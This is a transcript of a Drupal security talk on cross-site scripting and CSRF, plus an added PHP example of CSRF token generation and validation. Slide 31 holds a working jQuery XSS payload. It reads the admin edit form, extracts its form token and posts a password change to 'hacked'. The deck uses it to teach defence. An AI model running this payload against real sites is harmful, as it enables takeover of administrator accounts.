drupal security for coders and themers - xss and csrf
TRANSCRIPT
1. Your site is vulnerable. (really, it is)
2. I want you: to see the vulnerabilities
3. DisneyPrincessCastle!
6. Drupaler for 4 years
7. Drupal Association
8. Help with lots of d.o
9. 20+ modules (Pathauto, Token)
10. On Security Team
11. MasteringDrupal.com
12. DrupalDashboard.com
13. @knaddison Greg
14. Wrote a book
   - "Cracking Drupal is probably going to be the first Drupal book I buy." - Angie 'webchick' Byron
   - Or 40% off with Wiley coupon.
15. GVS
   - Development
16. Community focused
17. Progressive
18. Event management
19. Now....
20. Security
21. (with Ben) ->
22. Worry
23. Your site is vulnerable. You can make it safer.
24. A site is secure if private data is kept private, the site cannot be forced offline or into a degraded mode by a remote visitor, the site resources are used only for their intended purposes, and the site content can be edited only by appropriate users. - Some guy, Cracking Drupal chapter 1
25. Abusing resources
26. Stealing data
27. Altering data
28. Worry in a prioritized way.
30. http://www.cenzic.com/downloads/Cenzic_AppSecTrends_Q1-Q2-2009.pdf
31. Anything you can do XSS can do (better)

    // Demo payload from the slide: injected script fetches the victim's own
    // edit form (with its form token), then submits a password change.
    jQuery.get(Drupal.settings.basePath + 'user/1/edit', function (data, status) {
      if (status == 'success') {
        // Extract the token and other required data
        // (the token is a hex string, so the group needs "+" to capture all of it)
        var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9]+)"/);
        var token = matches[1];
        // Post the minimum amount of fields. Other fields get their default values.
        var payload = {
          "form_id": 'user_profile_form',
          "form_token": token,
          "pass[pass1]": 'hacked',
          "pass[pass2]": 'hacked'
        };
        jQuery.post(Drupal.settings.basePath + 'user/1/edit', payload);
      }
    });

    http://crackingdrupal.com/node/8
32. demo time
33. Tests for XSS
34. Themers
   - Read tpl.php and default implementations
35. Rely on your module developer for variables
36. Run the tests
37. Developers
   - Where does this text come from?
   - Is there a way a user can change it?
   - In what context is it being used?
39. Context
   - Mail context
40. Database context
41. Web context
42. Server context
   - Take an hour: http://acko.net/blog/safe-string-theory-for-the-web
44. Cross Site Request Forgery
   - Taking action
45. Without confirming intent
46. AKA CSRF
47. Cross Site Request Forgery
   - Demo time
48. Solutions to CSRF
   - Create a token based on something unique to the site, the user, and the action and
49. validate the token when the action is requested
   - Request:

        'query' => array('token' => drupal_get_token('my_id')),

   - Processing:

        if (!drupal_valid_token($_GET['token'], 'my_id')) {
          // Token missing or not issued for this user and action: do not act.
          drupal_access_denied();
          return;
        }

   - (Or just use the Form API)
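To make the "site, user, action" rule concrete, here is an added example that is not the deck's or Drupal's code: a standalone PHP version of the token pattern, with the link-building half and the validating half side by side, and a walk-through showing that a token bound to another session or another action is rejected. Drupal 6's drupal_get_token()/drupal_valid_token() follow the same idea using the site's private key and the session id; the private key value and the session ids below are constructed for the example.

```php
<?php
// Added example, not code from the slides or from Drupal: a CSRF token bound to
// the site (private key), the user (session id) and the action, checked before
// the action runs.

// Site-wide secret; in Drupal this is variable_get('drupal_private_key').
// Constructed value for the example only.
const SITE_PRIVATE_KEY = 'example-only-private-key-change-me';

// Token = MAC over (user, action) under the site secret. Changing any of the
// three inputs changes the token, which is exactly the property the slide asks for.
function csrf_token(string $session_id, string $action): string {
    return hash_hmac('sha256', $session_id . '|' . $action, SITE_PRIVATE_KEY);
}

// Constant-time comparison so a wrong token does not leak how much of it matched.
function csrf_valid(string $token, string $session_id, string $action): bool {
    return hash_equals(csrf_token($session_id, $action), $token);
}

// The "Request:" half: the token travels in the query string of the action link.
function delete_link(string $session_id, int $nid): string {
    $token = csrf_token($session_id, "node_delete_$nid");
    return "/node/$nid/delete?token=" . rawurlencode($token);
}

// The "Processing:" half: refuse unless the token matches this user and this action.
function handle_delete(array $get, string $session_id, int $nid): string {
    if (!isset($get['token']) || !csrf_valid($get['token'], $session_id, "node_delete_$nid")) {
        return "403 Access denied: missing or invalid token for node $nid";
    }
    return "node $nid deleted";
}

// Constructed walk-through: two sessions, one legitimate link, one forged.
$victim   = 'sess_victim_0001';
$attacker = 'sess_attacker_0002';
parse_str(parse_url(delete_link($victim, 42), PHP_URL_QUERY), $good);
parse_str(parse_url(delete_link($attacker, 42), PHP_URL_QUERY), $forged);

echo handle_delete($good, $victim, 42), "\n";   // deleted: right user, right action
echo handle_delete($forged, $victim, 42), "\n"; // 403: token was issued for another session
echo handle_delete($good, $victim, 43), "\n";   // 403: token was issued for node 42, not 43
echo handle_delete([], $victim, 42), "\n";      // 403: the bare request a CSRF page would send
```

The last line is the case the slide is about: a third-party page can make the victim's browser request `/node/42/delete`, but it cannot read the victim's session id or the site key, so it cannot supply a matching token. This is also why "just use the Form API" works: Drupal adds a form_token built the same way to every form and checks it on submission.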
50. Security and Usability
   - Confirmation forms == teh suck
51. Truly destructive actions should be hard to do
52. Don't delete, archive and provide undo
53. Choose links or forms for usability, not security
54. Severities and Other Vulnerabilities
   - drupal.org/security/contrib: lots of other categories of vulnerabilities in addition to XSS and CSRF
55. drupal.org/security-team
56. New Resource...
   - http://DrupalSecurityReport.org
   - Ustima.com
57. Resources
   - http://drupal.org/security-team
58. http://drupal.org/security
59. http://drupal.org/writing-secure-code
60. http://groups.drupal.org/node/15254 - discussion group
61. http://heine.familiedeelstra.com/
62. Cracking Drupal - http://crackingdrupal.com
63. http://crackingdrupal.com/node/34 - XSS Cheat Sheet
64. http://crackingdrupal.com/node/48 - CSRF
65. http://www.drupalsecurityreport.org